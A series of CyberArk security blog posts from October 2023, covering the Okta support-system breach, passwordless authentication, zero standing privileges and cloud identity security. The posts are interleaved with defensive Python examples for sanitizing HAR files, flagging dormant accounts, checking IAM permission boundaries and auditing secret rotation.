•  October 19: Okta confirmed the breach in a message to affected customers nearly three weeks after receiving the first customer alert.

•  October 20: Okta issued a public statement explaining that Okta had “identified adversarial activity that leveraged access to a stolen credential to access Okta’s support case management system. The threat actor was able to view files uploaded by certain Okta customers as part of recent support cases.”

This identity attack targeting Okta customers has a familiar ring to it. In January 2022, Lapsus$ attackers compromised an Okta third-party support engineer’s endpoint and gained access to Okta customers’ data. The company confirmed the breach in late March 2022 and announced sweeping changes to its support system to strengthen third-party security. Yet it seems that something went wrong along the way – reinforcing the need for strong security processes and operational procedures.

Mitigate Risk with Six Steps and New CyberArk HAR Tool

A recent Cyentia Institute study of 230,000 organizations found that 98% of firms have at least one third-party partner who has suffered a breach. It’s highly likely that your organization buys from or works with at least one third party and is indirectly connected to numerous vendors across the software supply chain. One of these companies will inevitably experience an identity breach. Don’t wait until it reaches your doorstep.

1.  Take the time to review your detection and response processes and timelines and focus on ways to reduce your mean time to detection (MTD) and mean time to response (MTR). The emerging Identity Threat Detection and Response (ITDR) discipline can serve as a helpful framework and an ideal end state.

The ability to baseline user behavior and continuously monitor suspicious connections to accounts – especially powerful admin accounts – can help you catch suspicious activities faster, such as logins via a VPN or outdated user agent, logins from unknown locations, logins directly following a support session, or accounts created/modified via REST API.


2.  Enforce MFA for all users, preferably with FIDO passwordless (i.e., passkeys related to physical devices) for securing the network identities.

3.  Only allow access to admin portals from verified sources (e.g., device, IP address and regions).

4.  Create a whitelist of specific machines that can access sensitive accounts (e.g., admin accounts) and block all others.

5.  Harden the operating system and enforce least privilege at the endpoint, which can significantly limit an attacker’s ability to access endpoints, establish persistence, steal files, compromise credentials and cause damage.

6.  Sanitize all credentials and session tokens (cookies) within a HAR file before it’s shared. We’ve created a tool to help simplify this process. Additionally, require support personnel to erase all support-related files immediately after the session ends.
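Step 6 in practice, as an added example that is not CyberArk’s HAR tool: a small Python sanitizer for a parsed HAR archive. It assumes a constructed sample entry (the tenant host, cookie name and token values are made up) and redacts cookies, Authorization-style headers and token-like query or form parameters in place, then checks that a known secret no longer appears anywhere in the file.

```python
import copy
import json
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

REDACTED = "[REDACTED]"

# Header names that carry credentials or session material (matched case-insensitively).
SENSITIVE_HEADERS = {"cookie", "set-cookie", "authorization", "proxy-authorization",
                     "x-api-key", "x-auth-token"}
# Query-string and form parameter names that commonly carry tokens or secrets.
SENSITIVE_PARAMS = {"token", "access_token", "id_token", "refresh_token",
                    "session", "sessiontoken", "password", "code"}


def _redact_named_values(items, sensitive_names):
    """Redact the value of each {name, value} pair whose name is sensitive; return the count."""
    count = 0
    for item in items or []:
        if str(item.get("name", "")).lower() in sensitive_names and item.get("value"):
            item["value"] = REDACTED
            count += 1
    return count


def _redact_cookies(cookies):
    """Every entry in a HAR 'cookies' array is session material, so all values are redacted."""
    count = 0
    for cookie in cookies or []:
        if cookie.get("value"):
            cookie["value"] = REDACTED
            count += 1
    return count


def _redact_url(url):
    """Redact sensitive query parameters embedded in the request URL itself."""
    parts = urlsplit(url)
    if not parts.query:
        return url, 0
    count, pairs = 0, []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower() in SENSITIVE_PARAMS and value:
            value, count = REDACTED, count + 1
        pairs.append((name, value))
    return urlunsplit(parts._replace(query=urlencode(pairs))), count


def sanitize_har(har):
    """Return (redacted deep copy of a parsed HAR dict, number of values redacted); input is untouched."""
    clean = copy.deepcopy(har)
    redactions = 0
    for entry in clean.get("log", {}).get("entries", []):
        request, response = entry.get("request", {}), entry.get("response", {})
        for message in (request, response):
            redactions += _redact_named_values(message.get("headers"), SENSITIVE_HEADERS)
            redactions += _redact_cookies(message.get("cookies"))
        redactions += _redact_named_values(request.get("queryString"), SENSITIVE_PARAMS)
        redactions += _redact_named_values(request.get("postData", {}).get("params"), SENSITIVE_PARAMS)
        if "url" in request:
            request["url"], n = _redact_url(request["url"])
            redactions += n
    return clean, redactions


def contains_secret(har, secret):
    """True if a known secret string still appears anywhere in the serialized archive."""
    return secret in json.dumps(har)


# Constructed sample: one request/response pair recorded the way browser dev tools would,
# against a placeholder tenant host. The cookie and token values are made up.
SAMPLE_SESSION = "s3ss10n-EXAMPLE-c00k13"
SAMPLE_BEARER = "eyJ.EXAMPLE.jwt"
SAMPLE_HAR = {
    "log": {
        "version": "1.2",
        "entries": [{
            "request": {
                "method": "GET",
                "url": "https://tenant.example.invalid/api/v1/users/me?token=" + SAMPLE_BEARER,
                "headers": [
                    {"name": "Cookie", "value": "sid=" + SAMPLE_SESSION},
                    {"name": "Authorization", "value": "Bearer " + SAMPLE_BEARER},
                    {"name": "Accept", "value": "application/json"},
                ],
                "cookies": [{"name": "sid", "value": SAMPLE_SESSION}],
                "queryString": [{"name": "token", "value": SAMPLE_BEARER}],
            },
            "response": {
                "status": 200,
                "headers": [
                    {"name": "Set-Cookie", "value": "sid=" + SAMPLE_SESSION + "; HttpOnly"},
                    {"name": "Content-Type", "value": "application/json"},
                ],
                "cookies": [{"name": "sid", "value": SAMPLE_SESSION}],
            },
        }],
    }
}
```

Run `sanitize_har(json.load(open("capture.har")))` on a real capture and write the first element back out; the second element is how many values were redacted, and `contains_secret` is the final check before the file leaves your hands.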

Identity is the root of trust in all organizations. When trust is abused – even if it involves just one compromised or misused identity – risk can travel downstream quickly. We must all remain vigilant, prioritize speed in detecting, mitigating and disclosing attacks, and evaluate all cybersecurity decisions through an identity lens.

Shay Nahari is VP of CyberArk Red Team Services, Andy Thompson is CyberArk Labs’ Offensive Security Research Evangelist and Khizar Sultan is CyberArk’s Senior Director of IAM Product and GTM Strategy.

____

Editor’s note: To learn more about the Oct. 2023 Okta breach and what your organization can do to mitigate risk, here are two resources that can help you:

Considering Passwordless? Here’s How to Do It https://www.cyberark.com/blog/considering-passwordless-heres-how-to-do-it/ Tue, 17 Oct 2023 14:30:11 +0000 https://www.cyberark.com/?p=183506

When creating a new password, you know the drill – it must be at least eight characters long, contain special characters and avoid sequential characters or be based on dictionary words. Although these requirements can be a pain in the neck and seriously hamper end user experience, they are not a sign of officious IT security teams. Instead, they are a necessary evil in modern enterprises because password cracking remains a viable vector for threat actors, and passwords are some of the most vulnerable targets for attackers.

By obtaining valid password credentials, attackers can stealthily infiltrate systems, escalate their privileges to an administrator or superuser level and wreak havoc on an organization’s security, reputation and bottom line.

To counter this, enterprises have increasingly adopted multi-factor authentication (MFA) to prevent users from logging into applications, corporate networks and resources without entering an additional form of verification. For instance, users may be asked to verify their login attempts by supplying a code via email, approving their login request in the authenticator app or tapping a smart card.

Unfortunately, threat actors have numerous tools in their arsenal to bypass MFA protections, including stealing cookies, employing social engineering or using MFA fatigue-based attacks. This brings us to square one: exposing passwords as the weakest security link.

But what if there was no password to start with? This would mean no infuriating password complexity requirements to adhere to, no periodic password updates, no password resets and, most importantly, no passwords for attackers to steal.

Passwordless Authentication Gains Traction

While the concept of passwordless authentication has been around for a long time, the market has just recently pivoted to actively using the technology. Passwordless authentication can use any means of validating the user except for a memorized secret. It could be a QR code displayed at login, an SMS message with a one-time code or a physical USB key, among other examples.

In the back-end, passwordless authentication relies on the same principle as digital certificates that use public and private keys. Think of the public key as the door and the private key as the key that unlocks it. With passwordless authentication, there is only one key for the door and only one door for the key. In one scenario, a user wants to create a secure account and uses a mobile authenticator app to generate a public-private key pair. The public key is provided to the system, and the private key is accessed from the user’s local device using an authentication factor such as a QR code.

Passwordless authentication offers a better user experience and improved productivity by providing a more seamless sign-in experience. It also increases security by eliminating password-related risks. As a side benefit, it also reduces IT overhead by freeing up resources used to assist end users with account unlocks and password resets.

While passwordless technology promises significant benefits, it’s important to understand that the journey to passwordless authentication is unique to the requirements of every business.

Why Going Passwordless is a Marathon

The hard reality is that no organization can go passwordless from day one. Most enterprises won’t ever be able to go completely passwordless. There are just too many legacy systems deeply entrenched in IT infrastructure that require passwords. So, it’s about finding the balance of what makes sense from a security, effort and cost point of view.

Going passwordless is no small task, especially when organizations deal with thousands of users, countless applications, hybrid and multi-cloud environments and complex login flows. Achieving an entirely passwordless environment involves a phased approach as technology continues to evolve and user adoption increases.

The following graphic encapsulates CyberArk’s view of a typical trajectory from passwords to passwordless while delivering a frictionless user experience.

Graphical depiction of how passwordless strategies should focus on reducing passwords while delivering a frictionless, secure user experience.

Organizations must understand that not all passwordless experiences are created equal, and their success depends upon selecting the best authentication factors that align with the business and user needs. Although eliminating passwords entirely is far off, reducing reliance on them is feasible by implementing the right IAM solutions that support passwordless use cases.

When considering IAM solutions, look for the following capabilities:

  1. Zero sign-on (ZSO). The first pillar of a true passwordless solution, ZSO, uses strong cryptographic standards such as certificates and combines user identities with contextual information such as device fingerprints and security posture. The key benefit of ZSO is that it enables users to seamlessly log in to their assigned applications and services without additional authentication once their devices are verified and meet security posture requirements. Remember to combine ZSO with other passwordless authentication factors best suited to your business requirements to enhance usability and security.
  2. FIDO2 integration and support. Almost every identity vendor supports FIDO2 Web Authentication (WebAuthn), and this standard is critical to enabling passwordless authentication for typical end users. Along with FIDO2, FIDO’s passkeys are a new multi-device passwordless factor that uses your devices’ security capabilities, further improving user experience. In addition, passkeys are highly phishing-proof and eliminate attack vectors possible with factors like MFA that require human interaction.
  3. Passwordless endpoint authentication. In a multi-device world, it’s essential to approach authentication to endpoints in the same way as applications and internal resources. Passwordless endpoint authentication can provide a better user experience and stronger security without negatively impacting user productivity.
  4. Secure VPN access for remote and hybrid users. As a critical security control to enable secure remote and hybrid user authentication, it’s recommended that users use adaptive MFA when accessing a corporate network through a VPN. Enforcing MFA for VPNs secures remote access to your corporate network, on-premises applications and resources while delivering a frictionless-yet-secure login experience that continuously evaluates and steps up with passwordless factors – as needed – based on contextual and risk analytics.
  5. Self-service passwordless authenticator replacement. For a true passwordless experience, it’s crucial to implement a solution that offers users the ability to self-enroll, replace and delete passwordless authenticators with the appropriate security controls, along with a wide variety of alternative passwordless authenticators to choose from. For instance, suppose a user were to lose their YubiKey or misplace their mobile phone. In that case, the user should be able to replace the passwordless authenticator factor from various factors with the appropriate security controls.

Planning For Passwordless

As with any security-related undertaking, going passwordless requires strategy, planning, partnership with trusted vendors and a disciplined move toward organizational adoption and continued education. Leadership backing is an absolute must to drive this initiative, as is the choice of an experienced and well-established vendor that supports the journey to passwordless.

As you think of taking your organization passwordless, consider the following:

  • What use cases are most suited for passwordless authentication?
  • Who are the riskiest users in the organization?
  • What passwordless factors offer the right level of security and convenience?
  • What’s the best way to pilot and scale the elimination of passwords without business disruptions or introducing additional risk?

When you engage with an IAM provider, do not hesitate to ask them about their idea of a true, holistic passwordless solution — and what innovation and intellectual property they have invested in to make that a reality. Finally, remember that passwordless authentication is just a piece of the enterprise security puzzle. Make sure your IAM partner can support your current and future identity security needs.

Amita Potnis leads thought leadership marketing at CyberArk.

Our Hearts Are Broken, But We Will Prevail https://www.cyberark.com/blog/our-hearts-are-broken-but-we-will-prevail/ Fri, 13 Oct 2023 12:51:52 +0000 https://www.cyberark.com/?p=183459

We are horrified by the barbaric attack on Israel and the Israeli people. Those of us who are watching from a distance are standing in solidarity with our friends, loved ones and colleagues who are on the ground in Israel. We stand by our employees and every Israeli around the world.

We’re thankful that our team in Israel is safe. A small percentage of our team has been called to military reserve duty. Some employees have bravely volunteered. We’re incredibly proud of all our team members and will continue to support them and keep them in our hearts and minds.

Our priority is the safety and well-being of our employees, while we remain committed to our customers and broader business stakeholders and our mission of securing the world against cyber threats, so together we can move fearlessly forward.

We believe CyberArk is in a strong position to operate successfully in this challenging environment. Right from the beginning, resiliency has been foundational to our operations, and we have built each function with business continuity in mind. We are a global organization with employees located around the world. Our operations, including global services and support, and executive management are diversified, and like every global company, our operating functions are supported from local offices in various geographies.

What’s happening in Israel is a human tragedy that’s impacting every Israeli around the world. Now, more than ever, we must stand united not just as colleagues, but as a community and do everything we can to support the people of Israel. These atrocities are horrific, but the people of Israel are strong and resilient, and they will prevail. We will prevail.

Matt Cohen is the CEO of CyberArk.

PAM and Cloud Security: The Case for Zero Standing Privileges https://www.cyberark.com/blog/pam-and-cloud-security-the-case-for-zero-standing-privileges/ Thu, 12 Oct 2023 11:57:08 +0000 https://www.cyberark.com/?p=183349

The cloud has introduced entirely new environments, roles and circumstances that require us to reimagine the definition of privileged access management (PAM) and how to apply those principles to secure identities. PAM was built on the notion that identities must be secured, not just managed, to protect an organization’s most valuable assets. The well-recognized values of PAM remain highly desirable – least privilege, role-based access control and auditability of high-risk sessions. The challenge is applying all those principles to these new environments, roles and circumstances.

New Cloud Environments, New Security Requirements

It’s relatively straightforward to delineate security responsibility in on-premises environments, as clear lines can be drawn at each infrastructure layer. There’s a physical data center, physical network cables, separate network protocols that flow through the wires, physical racks that contain compute or storage – and so on – all the way up the IT stack.

Those lines of separation and segregation of duty disappear completely in cloud environments, whether you operate in a hybrid environment (lifting and shifting workloads to the cloud) or take a cloud-native approach (building applications using a microservices architecture).

Perhaps the most mundane example of cloud usage occurs when an AWS user provisions a simple storage service (S3) bucket to store electronic files. In the on-premises world, this is the equivalent of someone breaking into a data center, pushing a rack on a trolley to the data center, placing the rack on the data center floor, plugging hard drives into that rack and connecting ethernet cables. Clearly, this would never be allowed in a traditional on-premises setting and demonstrates why we can’t think of access to a cloud service provider (CSP) as ‘just another console’ in cloud environments.

Our analysis of the three major CSPs shows that a user can access approximately 1,400 native services (e.g., AWS S3, Microsoft Azure Kubernetes Service or Google Cloud BigQuery), which collectively have 40,000 different access controls … and that number grows every day.

It’s clear we can’t apply a traditional notion of a small number of admin roles with static privileges to this dynamic environment.

Graphic containing the following text: CyberArk's analysis of the three major CSPs shows that a user can access approximately 1,400 native services. Collectively, these services have more than 40,000 different access controls.

Admin Overload and Evolving Roles

Traditional applications have straightforward, clear-cut boundaries between admins and users. With these applications, regular users couldn’t typically access sensitive systems and data. For instance, an employee using Outlook could send and receive emails but never perform tasks like changing POP or SMTP settings or adding or deleting users. Anyone with cloud access may be provisioned with entitlements to tap into 1,400 native services, ranging from fundamental capabilities like compute or storage to sophisticated capabilities such as artificial intelligence (AI) and machine learning (ML) engines. Perhaps surprising to some, there are also an array of SaaS services among these 1,400 native services, such as workflow engines, video processing and instant messaging. Clearly, anyone with the right to buy and use any of the above should be considered an admin.

It’s especially important to note that an entirely new population of ‘admins’ has appeared: software developers. With few exceptions, all modern software development tools and processes are run in the cloud, and the resultant software is deployed in the cloud. All software developers are now considered cloud ‘admins’ and must also be secured. Yet, identity security has been sacrificed to accelerate velocity.

Seventy-seven percent of security professionals say developers have too many privileges — making these human identities highly attractive targets for attackers and driving up cybersecurity debt. These expansive user permissions were set to account for all possible circumstances the user may face because prior systems were inflexible and static. Developers need to innovate; they cannot wait for their shared accounts to be created and secured for every service or workload they need to access, particularly those that are short-lived. This inflexible approach deviates from cloud provider best practices and creates unacceptable delays to engineering timelines.

Cloud Architectures and New Circumstances

The rise of microservices has generated fantastic scale, efficiency and cost savings. However, it has also created an intertwined web of dependencies and complexity for any true cloud native application. One illustration of this complexity is the web of interactions between the 700 Netflix microservices in 2014. Today, Netflix has well over 1,000.

The new circumstance created by cloud microservice architecture is that an outage impacts all customers. Simple isolation is gone. It’s not a single monolithic ERP application or simple email application where only a segment of users are impacted. A microservice application architecture means all users are impacted. When any system has an inevitable instability or an outage, the on-call engineers must be allowed to roam all over the production environment to troubleshoot, diagnose and fix the issue.

While dramatic, this is clearly one of many circumstances that didn’t exist in a classic IT setting.

Zero Standing Privileges: A Practical Cloud Identity Security Approach

A new approach is required to apply the principles of Zero Trust in a world with these environments, roles and circumstances, and to maintain velocity: a zero standing privilege (ZSP) system. ZSP completely deletes all entitlements associated with any user when not in use, but can dynamically provision on-the-fly entitlements for users based on the circumstance. Additionally, a ZSP system eliminates the possibility of lateral movement and will enforce rules against embedded credentials.

Security professionals must minimize access availability and risk while also maintaining the velocity of developers, DevOps and IT. Focusing on ZSP is the most viable way to reach these goals by preventing credential theft and limiting lateral movement, enabling organizations to embrace the full benefits of the cloud.

Charles Chu is the general manager of Cloud Security at CyberArk.

6 Essential Steps for Identity Security in Multi-Cloud Environments https://www.cyberark.com/blog/6-essential-steps-for-identity-security-in-multi-cloud-environments/ Thu, 05 Oct 2023 13:54:38 +0000 https://www.cyberark.com/?p=183173

In 2019, I founded and served as the CEO of a cloud security company (C3M), a journey that eventually led to our acquisition by CyberArk in 2022. Back then, the cloud security scene was budding, filled with migration buzz and a shifting urgency around securing the cloud. Acronyms like CSPM (cloud security posture management) were emerging, and enterprise security leaders grappled with where to begin.

Jump to 2023, and cloud security has transformed. Those then-burgeoning acronyms are now part of our security vocabulary; CSPM has grown into the now-vital CNAPP (cloud-native application protection platform). In this space, Cloud Identity and Entitlement Management (CIEM) steps up, fixing identity misconfigurations and taming permissions.

Yet, a clear pattern emerges in conversations with leaders from some of the world’s largest organizations. While detection platforms provide excellent insights into their cloud posture, addressing the identified issues isn’t straightforward. In fact, most security teams struggle to take the right risk-reduction measures for their environments. Effective cloud security goes beyond fixing configurations or permissions; it’s fundamentally about controlling “access” to your cloud—your consoles, data and infrastructure.

CyberArk’s Insight to Action framework helps address this gap between detection and remediation and offers a deep dive into six pivotal areas recognized as substantial threats in the cloud environment. Addressing these challenges provides a secure cloud experience and ensures smooth operations, eliminating potential loopholes and vulnerabilities.

The Insight to Action framework builds on CyberArk’s history of risk-focused best practices and identity security framework, the CyberArk Blueprint for Identity Security Success. Enterprises can achieve a proactive and resilient identity security posture by focusing on six “insights” across major cloud platforms like AWS, GCP and Azure.

In my previous blog, “Operationalizing Identity Security in the Public Cloud,” I discussed the significance of a comprehensive framework that transforms risk insights into actionable remediation measures. Taking it a step further, I’m now excited to share the following critical insights that can significantly help your organization reduce risk in the cloud.

Six Insights to Drive Actions to Reduce Cloud Risk


Insight 1: Dormant Users in the Cloud – The Hidden Threat

Dormant users or inactive accounts with retained access privileges pose a significant risk. They often go unnoticed in expansive cloud environments, offering backdoor entries for malicious actors. To mitigate this threat, you can:

  • Use automation to revoke access or deactivate accounts after a certain period of inactivity. Removing the dormant account eliminates the risk associated with that account being exploited. Fewer inactive accounts mean fewer entry points for attackers.
  • Audit user activity regularly. Implement monitoring tools to identify and report on accounts with prolonged inactivity.
  • Conduct frequent access reviews of user roles, permissions and activity to ensure only necessary and active accounts exist. Keeping only necessary and active accounts helps maintain compliance with many regulatory frameworks that require minimization of access.
  • Set up alerts for any activity on dormant accounts. Any sudden activity should be treated as suspicious.
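To make the first and last bullets concrete, here is an added Python example (not part of the Insight to Action framework or any CyberArk tooling) that flags dormant accounts from a small credential-report-style CSV and surfaces sign-ins by those accounts. The column names, timestamps and events are constructed for the example and do not follow any specific provider’s schema; the clock is pinned so the results are reproducible.

```python
import csv
import io
from datetime import datetime, timedelta, timezone

INACTIVITY_DAYS = 90  # threshold after which an account is considered dormant
NEVER = "N/A"         # marker the constructed report uses for "credential never used"

# Pinned "current time" so the example gives the same answer on every run.
NOW = datetime(2023, 10, 1, tzinfo=timezone.utc)

# Constructed sample report, loosely modelled on the credential reports cloud
# providers export: one row per user with last-used timestamps per credential.
SAMPLE_REPORT = """user,create_date,password_last_used,access_key_1_last_used
alice,2021-03-01T09:00:00Z,2023-09-28T14:10:00Z,N/A
bob,2022-06-15T09:00:00Z,2023-04-02T08:00:00Z,2023-05-30T11:00:00Z
svc-backup,2020-01-10T09:00:00Z,N/A,2023-09-30T01:00:00Z
contractor-old,2021-11-20T09:00:00Z,2022-12-01T10:00:00Z,N/A
never-used,2023-02-01T09:00:00Z,N/A,N/A
fresh-hire,2023-09-20T09:00:00Z,N/A,N/A
"""


def _parse_ts(value):
    """Parse an ISO-8601 UTC timestamp; None when the credential was never used."""
    if not value or value == NEVER:
        return None
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def last_activity(row):
    """Most recent last-used timestamp across the user's credentials, or None."""
    stamps = [_parse_ts(row.get(k)) for k in ("password_last_used", "access_key_1_last_used")]
    stamps = [s for s in stamps if s is not None]
    return max(stamps) if stamps else None


def find_dormant(report_csv, now=NOW, inactivity_days=INACTIVITY_DAYS):
    """Return {user: days_idle} for accounts idle longer than the threshold.

    Accounts that have never been used are measured from their creation date, so a
    long-provisioned but never-activated account is flagged, while a fresh one is not.
    """
    cutoff = now - timedelta(days=inactivity_days)
    dormant = {}
    for row in csv.DictReader(io.StringIO(report_csv)):
        reference = last_activity(row) or _parse_ts(row["create_date"])
        if reference < cutoff:
            dormant[row["user"]] = (now - reference).days
    return dormant


# Constructed sign-in events. Any login by an account already flagged dormant is
# treated as suspicious, per the "alert on activity on dormant accounts" bullet.
SAMPLE_EVENTS = [
    {"time": "2023-10-01T02:15:00Z", "user": "contractor-old", "source_ip": "198.51.100.7"},
    {"time": "2023-10-01T08:00:00Z", "user": "alice", "source_ip": "203.0.113.5"},
]


def suspicious_logins(events, dormant):
    """Sign-in events whose user was dormant at the time the report was generated."""
    return [event for event in events if event["user"] in dormant]


if __name__ == "__main__":
    dormant = find_dormant(SAMPLE_REPORT)
    for user, days in sorted(dormant.items(), key=lambda kv: -kv[1]):
        print(f"dormant: {user:15} idle {days} days")
    for event in suspicious_logins(SAMPLE_EVENTS, dormant):
        print(f"ALERT: dormant account {event['user']} signed in from {event['source_ip']} at {event['time']}")
```

In practice the dormant set feeds an automated deactivation or access-revocation step, and the alert check runs against the live sign-in stream rather than a fixed list.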

Insight 2: Misconfigurations – The Identity Blindspot

Misconfigurations in a cloud environment refer to incorrectly set up assets or services that can expose an organization to risks of varying levels. With the complexity of modern cloud architectures, configuration settings can number in the thousands. Each setting provides a potential opportunity for error. Amid thousands of settings, a few incorrect ones can easily go unnoticed.
To address this threat, here are some steps you can take:

  • Review and audit cloud configurations frequently to align with industry best practices.
  • Review IAM policies regularly to ensure the principle of least privilege.
  • Enforce multi-factor authentication (MFA) for all users.
  • Implement a just-in-time (JIT) access model, removing standing permissions and aligning to zero standing privilege (ZSP). This one step alone can drastically reduce your risk surface by ensuring that access is given to the right people at the right time – no more and no less.
  • Deploy automated scanners. Integrate advanced tools designed to scan for IAM misconfigurations systematically. This proactive approach enables a comprehensive understanding of the identities present in the cloud (and their configurations) and identifies potential discrepancies.

In the event of misconfigurations, automated scanners alone can pinpoint issues and provide actionable insights on rectifying them, ensuring a swift and effective resolution.

Insight 3: Persistent Access to the Cloud – The Overlooked Backdoor

Persistent access means that if an attacker compromises an account, they have indefinite access until detected. This extended time frame allows malicious entities to establish a stronger foothold, conduct reconnaissance, and even spread to other parts of the network.

To mitigate this threat, you can:

  • Shift to JIT access, providing temporary access that auto-revokes after a certain period or post-task completion. This reduces the time window in which credentials can be misused.
  • Conduct frequent access rights reviews to ensure that users have only the permissions necessary for their roles and that any excess permissions are promptly revoked.
  • Enforce MFA for all users, especially those with elevated privileges. This adds an additional layer of security, ensuring that even if credentials are compromised, attackers have a harder time gaining access.
  • Adopt a ZSP model. Transition away from standing privileges where users have continuous elevated access. In a ZSP model, all privileges are revoked by default and users request elevation only when needed.

ZSP is gaining traction because it limits the time window for potential abuse of elevated privileges: users get only the access they need and only for as long as they need it. Coupling ZSP with JIT further reduces the exposure window, making the two a powerful combination against potential threats.

Insight 4: Excessive Permissions – A Gate Wide Open

Excessive permissions in the cloud provide users, and potentially attackers, more access than required to perform their tasks, turning even a minor breach into a potential catastrophe. Excessive permissions in the cloud can lead to data leaks, privilege escalation and operational risks.
To address this threat, you’ll want to:

  • Assign permissions based on organizational roles (role-based access control, or RBAC). Ensure that each role has only the permissions necessary to perform its tasks.
  • Automate permission assignments. Use tools that automatically assign and adjust permissions based on roles, tasks and workflows.
  • Adhere to the principle of least privilege (PoLP). Always provide the minimum necessary access. Regularly review and adjust permissions, ensuring they align with users’ current roles and tasks.
  • Switch to a JIT access model. Instead of permanent high-level permissions, provide temporary access for specific tasks. Once the task is done, permissions revert to their normal levels. This great risk reduction measure buys you time to study and refine the permissions.
  • Continuously monitor user activities and employ AI or machine learning-based tools to detect and alert anomalous behaviors.
  • Implement permission boundaries. Set hard limits on what permissions can be granted, ensuring that even administrators cannot inadvertently grant excessive rights.
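As an added example (not CyberArk's code or any cloud provider's SDK), the following Python models how a permissions boundary caps an over-broad identity policy, and includes the kind of wildcard check that the IAM misconfiguration scanners from Insight 2 would run. The policy documents are constructed samples in the AWS IAM JSON shape, and the evaluator is a deliberately simplified model (Allow/Deny statements, action wildcards, no conditions or resource ARN matching).

```python
"""Effective-permission check for an IAM-style policy plus a permissions boundary.

Added example, not CyberArk's code. The policy documents below are constructed
samples in the AWS IAM JSON shape; the evaluation is a simplified model
(Allow/Deny statements, '*' wildcards in actions, no conditions or resource
matching) used to show how a boundary caps an over-broad identity policy.
"""
import fnmatch
from typing import Dict, Iterable, List, Optional, Tuple

# Constructed sample: a developer role that was granted far more than its tasks need.
OVERBROAD_IDENTITY_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": "*", "Resource": "*"},
    ],
}

# Constructed sample: a permissions boundary that hard-limits what the role can
# ever do, regardless of which identity policies get attached to it later.
DEVELOPER_BOUNDARY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow",
         "Action": ["s3:Get*", "s3:List*", "logs:*", "sts:GetCallerIdentity"],
         "Resource": "*"},
        {"Effect": "Deny", "Action": ["iam:*", "organizations:*"], "Resource": "*"},
    ],
}


def _as_list(value):
    return value if isinstance(value, list) else [value]


def policy_allows(policy: Dict, action: str) -> bool:
    """Evaluate one policy document for one action; an explicit Deny wins over any Allow."""
    allowed = False
    for stmt in policy.get("Statement", []):
        for pattern in _as_list(stmt.get("Action", [])):
            if fnmatch.fnmatchcase(action, pattern):
                if stmt.get("Effect") == "Deny":
                    return False
                allowed = True
    return allowed


def effective_allow(identity_policy: Dict, boundary: Optional[Dict], action: str) -> bool:
    """An action is effectively allowed only if BOTH the identity policy and the boundary allow it."""
    if not policy_allows(identity_policy, action):
        return False
    if boundary is None:
        return True
    return policy_allows(boundary, action)


def excessive_statements(policy: Dict) -> List[str]:
    """Scanner check: report Allow statements that grant wildcard actions."""
    findings = []
    for i, stmt in enumerate(policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow":
            continue
        actions = _as_list(stmt.get("Action", []))
        resources = _as_list(stmt.get("Resource", []))
        if "*" in actions and "*" in resources:
            findings.append(f"Statement {i}: Allow * on * (full admin)")
        elif any(a == "*" or a.endswith(":*") for a in actions):
            findings.append(f"Statement {i}: service-wide wildcard actions {actions}")
    return findings


def compare(actions: Iterable[str]) -> Dict[str, Tuple[bool, bool]]:
    """For each action: (allowed without a boundary, allowed with the developer boundary)."""
    return {a: (effective_allow(OVERBROAD_IDENTITY_POLICY, None, a),
                effective_allow(OVERBROAD_IDENTITY_POLICY, DEVELOPER_BOUNDARY, a))
            for a in actions}


if __name__ == "__main__":
    for finding in excessive_statements(OVERBROAD_IDENTITY_POLICY):
        print("finding:", finding)
    for action, (without, with_b) in compare(
            ["s3:GetObject", "iam:CreateUser", "ec2:RunInstances"]).items():
        print(f"{action:18} no boundary={without!s:5} with boundary={with_b}")
```

The point to notice is that the identity policy on its own grants iam:CreateUser, while the same policy evaluated inside the boundary does not. AWS treats a permissions boundary as an intersection, so an administrator who later attaches a broader policy to the role still cannot push it past the boundary, which is exactly the "hard limit" the last bullet describes.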

Insight 5: Unrotated Secrets – A Ticking Time Bomb

In the world of multi-cloud architecture, secrets — be they API keys, tokens, public/private key pairs or passwords — act as vital access conduits to crucial data and services. AWS, GCP and Azure, three cloud giants, all offer their own versions of secret management services. However, if these secrets remain static, the risk compounds over time. The threat is akin to leaving a backdoor unlocked indefinitely; it is only a matter of time before someone or something exploits it.

Proactively managing these secrets across all cloud platforms is not a mere best practice — it’s a necessity.
To mitigate this threat, you can:

  • Implement a mandatory policy to rotate secrets at regular intervals. The frequency might vary based on the sensitivity of the secret.
  • Automate secrets rotation. Use cloud-native tools or third-party solutions to reduce manual errors. In multi-cloud environments, establishing a centralized management system for all secrets and enforcing consistent controls is crucial for maintaining robust security practices.
  • Revoke and replace secrets instantly. Ensure you have mechanisms in place to do this in the case of suspected breaches.
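The three bullets above describe a policy (rotate on a schedule that depends on sensitivity, automate it, and be able to revoke instantly). As an added example that is not CyberArk's code or any provider's SDK, the Python below implements that policy over a constructed, in-memory secrets inventory spanning three clouds: an age audit by sensitivity tier, a rotation that keeps the previous version valid for a short grace window so consumers do not break, and an emergency path that revokes the old version immediately. The tier maximum ages and the 24-hour grace window are assumptions; in practice the inventory would be read from each cloud's secret manager and the policy from a central store.

```python
"""Rotation-age audit and overlap-window rotation for a secrets inventory.

Added example, not CyberArk's code or any cloud provider's SDK. The inventory
is a constructed in-memory sample; the maximum ages per sensitivity tier and the
grace window are assumptions. Issuing the actual credential material is the
provider's job and is not modelled here.
"""
from dataclasses import dataclass, field
from datetime import datetime, timedelta, timezone
from typing import Dict, List, Optional

# Assumed policy: how old a secret may get before rotation is overdue, by tier.
MAX_AGE = {
    "critical": timedelta(days=30),   # e.g. cloud admin keys, break-glass credentials
    "high": timedelta(days=90),       # service-to-service API keys
    "standard": timedelta(days=180),  # low-impact integration tokens
}

# How long the previous version keeps working after a rotation, so consumers that
# have not yet picked up the new value do not break. Keeping it short limits how
# long a leaked old value stays useful.
GRACE_WINDOW = timedelta(hours=24)

NOW = datetime(2024, 1, 1, tzinfo=timezone.utc)  # fixed clock for the sample run


@dataclass
class Secret:
    name: str
    tier: str
    current_version: int
    rotated_at: datetime
    # version -> revoke-after time (None = current, no revocation scheduled)
    valid_versions: Dict[int, Optional[datetime]] = field(default_factory=dict)
    compromised: bool = False


def rotation_status(secret: Secret, now: datetime) -> str:
    """'revoke-now' on suspected compromise, else 'overdue', 'due-soon' (last 10% of max age) or 'ok'."""
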